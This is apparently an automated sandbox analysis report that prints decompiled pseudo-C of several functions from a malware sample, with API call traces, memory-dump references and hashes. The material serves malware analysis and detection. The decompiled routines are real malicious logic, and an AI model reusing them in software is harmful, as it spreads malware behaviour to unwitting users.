				_t21 = E02B96C09();
				if(_t21 != 0) {
					_t59 =  *0x2b9d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x2b9d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x2b9d160(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E02B9496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x2b9d2a8; // 0x3e1a5a8
					if( *0x2b9d25c > 5) {
						_t8 = _t26 + 0x2b9e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x2b9e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E02B9729A(_t27, _t27);
					_t31 = E02B9232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x2b9d270 =  *0x2b9d270 ^ 0x81bbe65d;
						_t32 = E02B9A71F(0x60);
						 *0x2b9d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x2b9d32c; // 0x69b95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x2b9d32c; // 0x69b95b0
							 *_t51 = 0x2b9e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x2b9d238, 0, 0x43);
							 *0x2b9d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x2b9d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x2b9d2a8; // 0x3e1a5a8
								_t13 = _t58 + 0x2b9e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x2b9c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E02B99135( ~_v8 &  *0x2b9d270,  &E02B9D00C); // executed
								_t54 = E02B9888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E02B987AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E02B951B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E02B91C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x2b9d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E02B9A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x02b95ba2
                                                          0x02b95bad
                                                          0x02b95bb0
                                                          0x02b95bb3
                                                          0x02b95bb6
                                                          0x02b95bbd
                                                          0x02b95bbf
                                                          0x02b95bcb
                                                          0x02b95bcd
                                                          0x02b95bcd
                                                          0x02b95bd6
                                                          0x02b95bdc
                                                          0x02b95be1
                                                          0x02b95bfb
                                                          0x02b95c07
                                                          0x02b95c09
                                                          0x02b95c0e
                                                          0x02b95c18
                                                          0x02b95c18
                                                          0x02b95c10
                                                          0x02b95c10
                                                          0x02b95c10
                                                          0x02b95c10
                                                          0x02b95c1f
                                                          0x02b95c2c
                                                          0x02b95c33
                                                          0x02b95c38
                                                          0x02b95c38
                                                          0x02b95c40
                                                          0x02b95c43
                                                          0x02b95c69
                                                          0x02b95c75
                                                          0x02b95c7a
                                                          0x02b95c7f
                                                          0x02b95c81
                                                          0x02b95cad
                                                          0x02b95caf
                                                          0x02b95c83
                                                          0x02b95c87
                                                          0x02b95c8c
                                                          0x02b95c91
                                                          0x02b95c98
                                                          0x02b95c9e
                                                          0x02b95ca3
                                                          0x02b95ca9
                                                          0x02b95cb0
                                                          0x02b95cb2
                                                          0x02b95cb4
                                                          0x02b95cc3
                                                          0x02b95cc9
                                                          0x02b95cce
                                                          0x02b95cd0
                                                          0x02b95d00
                                                          0x02b95d02
                                                          0x02b95cd2
                                                          0x02b95cd2
                                                          0x02b95cd8
                                                          0x02b95ce5
                                                          0x02b95ceb
                                                          0x02b95ceb
                                                          0x02b95cf3
                                                          0x02b95cfc
                                                          0x02b95d03
                                                          0x02b95d05
                                                          0x02b95d07
                                                          0x02b95d0e
                                                          0x02b95d1b
                                                          0x02b95d25
                                                          0x02b95d27
                                                          0x02b95d29
                                                          0x00000000
                                                          0x00000000
                                                          0x02b95d2b
                                                          0x02b95d30
                                                          0x02b95d32
                                                          0x02b95d39
                                                          0x02b95d3d
                                                          0x02b95d40
                                                          0x02b95d55
                                                          0x02b95d59
                                                          0x02b95d5e
                                                          0x00000000
                                                          0x02b95d5e
                                                          0x02b95d42
                                                          0x02b95d44
                                                          0x00000000
                                                          0x00000000
                                                          0x02b95d4f
                                                          0x02b95d51
                                                          0x02b95d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b95d53
                                                          0x02b95d36
                                                          0x02b95d36
                                                          0x02b95d07
                                                          0x02b95c45
                                                          0x02b95c45
                                                          0x02b95c4a
                                                          0x02b95d60
                                                          0x02b95d64
                                                          0x02b95d6c
                                                          0x02b95d6c
                                                          0x00000000
                                                          0x02b95d64
                                                          0x02b95c50
                                                          0x02b95c53
                                                          0x02b95c5d
                                                          0x02b95c64
                                                          0x00000000
                                                          0x02b95d74
                                                          0x02b95d74
                                                          0x02b95d78
                                                          0x02b95d7c
                                                          0x02b95d7c

                                                          APIs
                                                            • Part of subcall function 02B96C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,02B95BBB,00000000,00000000), ref: 02B96C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02B95C38
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • memset.NTDLL ref: 02B95C87
                                                          • RtlInitializeCriticalSection.NTDLL(069B9570), ref: 02B95C98
                                                            • Part of subcall function 02B91C66: memset.NTDLL ref: 02B91C7B
                                                            • Part of subcall function 02B91C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02B91CBD
                                                            • Part of subcall function 02B91C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 02B91CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02B95CC3
                                                          • wsprintfA.USER32 ref: 02B95CF3
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: 9a7a1ad8b358656354973ffef7af097c384c0b39edd2897e498a221cceb2ab94
                                                          • Instruction ID: 6ee25eadcf35d4d3afefd8265c1cbc05ff6e59782b6099ebd058afeb6ef1d833
                                                          • Opcode Fuzzy Hash: 9a7a1ad8b358656354973ffef7af097c384c0b39edd2897e498a221cceb2ab94
                                                          • Instruction Fuzzy Hash: 0051D271E81229ABDF32ABB9D988F5E77B8EF08740F9448B6E501D7140E7709545CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B962DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E02B962DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02B9A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02B9A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02B9A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2b9d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x02b962e1
                                                          0x02b962e8
                                                          0x02b962ed
                                                          0x02b962f0
                                                          0x02b962f7
                                                          0x02b962fa
                                                          0x02b962fd
                                                          0x02b96302
                                                          0x02b96307
                                                          0x02b9645b
                                                          0x02b9645d
                                                          0x02b9645f
                                                          0x02b96464
                                                          0x02b96464
                                                          0x02b9630d
                                                          0x02b96310
                                                          0x02b96313
                                                          0x02b96315
                                                          0x02b96315
                                                          0x02b96319
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9631d
                                                          0x02b96349
                                                          0x02b9634e
                                                          0x02b96350
                                                          0x02b96350
                                                          0x02b96353
                                                          0x02b96356
                                                          0x02b96356
                                                          0x02b96358
                                                          0x00000000
                                                          0x02b96323
                                                          0x02b96325
                                                          0x02b96344
                                                          0x02b96344
                                                          0x02b9635b
                                                          0x02b9635b
                                                          0x02b9635c
                                                          0x02b9635c
                                                          0x02b9635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9635f
                                                          0x02b96329
                                                          0x02b96370
                                                          0x02b96374
                                                          0x02b9644e
                                                          0x02b96450
                                                          0x02b96450
                                                          0x02b96451
                                                          0x02b96454
                                                          0x00000000
                                                          0x02b96454
                                                          0x02b9637d
                                                          0x02b9638e
                                                          0x02b96392
                                                          0x02b9644a
                                                          0x00000000
                                                          0x02b9644a
                                                          0x02b96398
                                                          0x02b9639b
                                                          0x02b9639f
                                                          0x02b963a3
                                                          0x02b963a8
                                                          0x02b96440
                                                          0x02b96440
                                                          0x00000000
                                                          0x02b96446
                                                          0x02b963b3
                                                          0x02b963bc
                                                          0x02b963d0
                                                          0x02b963d7
                                                          0x02b963ec
                                                          0x02b963f2
                                                          0x02b963fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b963fc
                                                          0x02b963fc
                                                          0x02b963fc
                                                          0x02b96403
                                                          0x02b9640b
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9640d
                                                          0x02b96416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x02b96418
                                                          0x02b9641a
                                                          0x02b9641d
                                                          0x02b9641d
                                                          0x02b96420
                                                          0x02b96424
                                                          0x02b96427
                                                          0x02b9642d
                                                          0x02b96430
                                                          0x02b96437
                                                          0x00000000
                                                          0x02b963b3
                                                          0x02b9632e
                                                          0x02b96336
                                                          0x02b9633c
                                                          0x02b9633e
                                                          0x02b9633e
                                                          0x02b96341
                                                          0x02b96343
                                                          0x00000000
                                                          0x02b96343
                                                          0x02b9631d
                                                          0x02b96363
                                                          0x02b96368
                                                          0x02b9636a
                                                          0x02b9636a
                                                          0x02b9636d
                                                          0x02b9636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 02B963D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 02B963EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 02B96403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 02B96427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 4639b51a01e98bffe06f1652515a9edde5552fe6c6e63fe26aef0ff5ba80e8e9
                                                          • Instruction ID: 587b081994b47c635083dd2d395d48dfd94ec4b1d405f8edddde975758292a6b
                                                          • Opcode Fuzzy Hash: 4639b51a01e98bffe06f1652515a9edde5552fe6c6e63fe26aef0ff5ba80e8e9
                                                          • Instruction Fuzzy Hash: 4D51DF71A04208EFDF20CF99C5857ADBBBAFF45354F19C0BAE8259B205C730AA51CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B96545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E02B96545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02B9A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x02b96551
                                                          0x02b96555
                                                          0x02b96556
                                                          0x02b96557
                                                          0x02b96559
                                                          0x02b9655b
                                                          0x02b9655e
                                                          0x02b96563
                                                          0x02b965fa
                                                          0x02b96601
                                                          0x02b96601
                                                          0x02b9656c
                                                          0x02b96573
                                                          0x02b96583
                                                          0x02b96583
                                                          0x02b96589
                                                          0x02b9658b
                                                          0x02b96590
                                                          0x02b96599
                                                          0x02b9659f
                                                          0x02b965a4
                                                          0x02b965af
                                                          0x02b965b3
                                                          0x02b965b5
                                                          0x02b965b6
                                                          0x02b965bf
                                                          0x02b965c3
                                                          0x02b965d4
                                                          0x02b965c5
                                                          0x02b965ca
                                                          0x02b965cf
                                                          0x02b965de
                                                          0x02b965de
                                                          0x02b965b3
                                                          0x02b965e4
                                                          0x02b965ea
                                                          0x02b965ea
                                                          0x02b965f3
                                                          0x02b965f8
                                                          0x02b965f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 2abb05a7458973c0b6aad9d26b8295e6b140f210e721b25eadac97390100aad1
                                                          • Instruction ID: 7155d7f00649fa6f54d71514f09ebc29f6e9582ebaffdf8c04e7d5cd848f07e2
                                                          • Opcode Fuzzy Hash: 2abb05a7458973c0b6aad9d26b8295e6b140f210e721b25eadac97390100aad1
                                                          • Instruction Fuzzy Hash: FD213075900209FFCF11DFA8C98499EBBB9FF48344B1041BAE906D7215EB30DA01CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B98D14, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E02B98D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02B9A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2b9d2a8; // 0x3e1a5a8
				_t4 = _t24 + 0x2b9edc0; // 0x69b9368
				_t5 = _t24 + 0x2b9ed68; // 0x4f0053
				_t45 = E02B95356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2b9d2a8; // 0x3e1a5a8
						_t11 = _t32 + 0x2b9edb4; // 0x69b935c
						_t48 = _t11;
						_t12 = _t32 + 0x2b9ed68; // 0x4f0053
						_t52 = E02B945C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2b9d2a8; // 0x3e1a5a8
							_t13 = _t35 + 0x2b9edfe; // 0x30314549
							if(E02B98E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2b9d25c - 6;
								if( *0x2b9d25c <= 6) {
									_t42 =  *0x2b9d2a8; // 0x3e1a5a8
									_t15 = _t42 + 0x2b9ec0a; // 0x52384549
									E02B98E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2b9d2a8; // 0x3e1a5a8
							_t17 = _t38 + 0x2b9edf8; // 0x69b93a0
							_t18 = _t38 + 0x2b9edd0; // 0x680043
							_t45 = E02B95D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2b9d238, 0, _t52);
						}
					}
					HeapFree( *0x2b9d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02B94F14(_t54);
				}
				return _t45;
			}

















                                                          0x02b98d14
                                                          0x02b98d24
                                                          0x02b98d27
                                                          0x02b98d2e
                                                          0x02b98d30
                                                          0x02b98d30
                                                          0x02b98d33
                                                          0x02b98d38
                                                          0x02b98d3f
                                                          0x02b98d51
                                                          0x02b98d55
                                                          0x02b98d63
                                                          0x02b98d71
                                                          0x02b98d75
                                                          0x02b98e06
                                                          0x02b98e06
                                                          0x02b98d7b
                                                          0x02b98d7b
                                                          0x02b98d80
                                                          0x02b98d80
                                                          0x02b98d87
                                                          0x02b98d93
                                                          0x02b98d95
                                                          0x02b98d97
                                                          0x02b98d99
                                                          0x02b98da0
                                                          0x02b98db2
                                                          0x02b98db4
                                                          0x02b98dbb
                                                          0x02b98dbd
                                                          0x02b98dc4
                                                          0x02b98dcf
                                                          0x02b98dcf
                                                          0x02b98dbb
                                                          0x02b98dd4
                                                          0x02b98dd9
                                                          0x02b98de0
                                                          0x02b98dfe
                                                          0x02b98e00
                                                          0x02b98e00
                                                          0x02b98d97
                                                          0x02b98e12
                                                          0x02b98e12
                                                          0x02b98e14
                                                          0x02b98e19
                                                          0x02b98e1b
                                                          0x02b98e1b
                                                          0x02b98e26

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,069B9368,00000000,?,74B5F710,00000000,74B5F730), ref: 02B98D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,069B93A0,?,00000000,30314549,00000014,004F0053,069B935C), ref: 02B98E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02B9523E), ref: 02B98E12
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c323d1b6eaf5a047446a22e8e5bbdeddc29d3407c14dc8ddaa00b21a63c3a388
                                                          • Instruction ID: 23ba426de17843b2ff1a8d504febcf55b0a269c7b2fae4053116dd6b6a8c657e
                                                          • Opcode Fuzzy Hash: c323d1b6eaf5a047446a22e8e5bbdeddc29d3407c14dc8ddaa00b21a63c3a388
                                                          • Instruction Fuzzy Hash: BD31C072940109BFDF21EB99DD84E9ABBBEEF49744F1604A6F5019B060D3709A54CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02B9A376, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E02B9A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2b9d340; // 0x69b9a88
				_push(0x800);
				_push(0);
				_push( *0x2b9d238);
				if( *0x2b9d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2b9d24c =  *0x2b9d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02B97306(_t44, _t40);
						_t18 = E02B94A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2b9d24c < 5) {
								 *0x2b9d24c =  *0x2b9d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02B96761();
						RtlFreeHeap( *0x2b9d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E02B91F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02B94AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}











                                                          0x02b9a376
                                                          0x02b9a376
                                                          0x02b9a379
                                                          0x02b9a37a
                                                          0x02b9a384
                                                          0x02b9a38b
                                                          0x02b9a390
                                                          0x02b9a392
                                                          0x02b9a398
                                                          0x02b9a3c0
                                                          0x02b9a3d8
                                                          0x02b9a3da
                                                          0x02b9a3db
                                                          0x02b9a3dd
                                                          0x02b9a41b
                                                          0x02b9a41b
                                                          0x02b9a421
                                                          0x02b9a427
                                                          0x02b9a427
                                                          0x02b9a3df
                                                          0x02b9a3e5
                                                          0x02b9a3e8
                                                          0x02b9a3f7
                                                          0x02b9a3f9
                                                          0x02b9a400
                                                          0x02b9a434
                                                          0x02b9a439
                                                          0x02b9a43b
                                                          0x02b9a43d
                                                          0x02b9a43d
                                                          0x00000000
                                                          0x02b9a43b
                                                          0x02b9a402
                                                          0x02b9a407
                                                          0x02b9a415
                                                          0x00000000
                                                          0x02b9a415
                                                          0x02b9a3cf
                                                          0x02b9a3d4
                                                          0x02b9a3d4
                                                          0x00000000
                                                          0x02b9a3d4
                                                          0x02b9a3a2
                                                          0x00000000
                                                          0x00000000
                                                          0x02b9a3b1
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 02B9A39A
                                                            • Part of subcall function 02B94AB6: GetTickCount.KERNEL32 ref: 02B94ACA
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B1A
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B37
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B63
                                                            • Part of subcall function 02B94AB6: HeapFree.KERNEL32(00000000,?), ref: 02B94B75
                                                            • Part of subcall function 02B94AB6: wsprintfA.USER32 ref: 02B94B96
                                                            • Part of subcall function 02B94AB6: HeapFree.KERNEL32(00000000,?), ref: 02B94BA6
                                                            • Part of subcall function 02B94AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B94BD4
                                                            • Part of subcall function 02B94AB6: GetTickCount.KERNEL32 ref: 02B94BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 02B9A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,02B95289,?,02B95289,00000002,?,?,02B95D5E,?), ref: 02B9A415
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: d6712e859ce585531961d2d871927d617c90a9f05b1da22fd3b1b048dfc410cf
                                                          • Instruction ID: 534e8314b88a5c3c503ce416048d0d00d15a649bc7ba5e422559fb2810012071
                                                          • Opcode Fuzzy Hash: d6712e859ce585531961d2d871927d617c90a9f05b1da22fd3b1b048dfc410cf
                                                          • Instruction Fuzzy Hash: B8214971640205EBCF11EF99D984FAA7BACEB49384F1084B6FD019B240EB70E955DBA1
                                                          Uniqueness

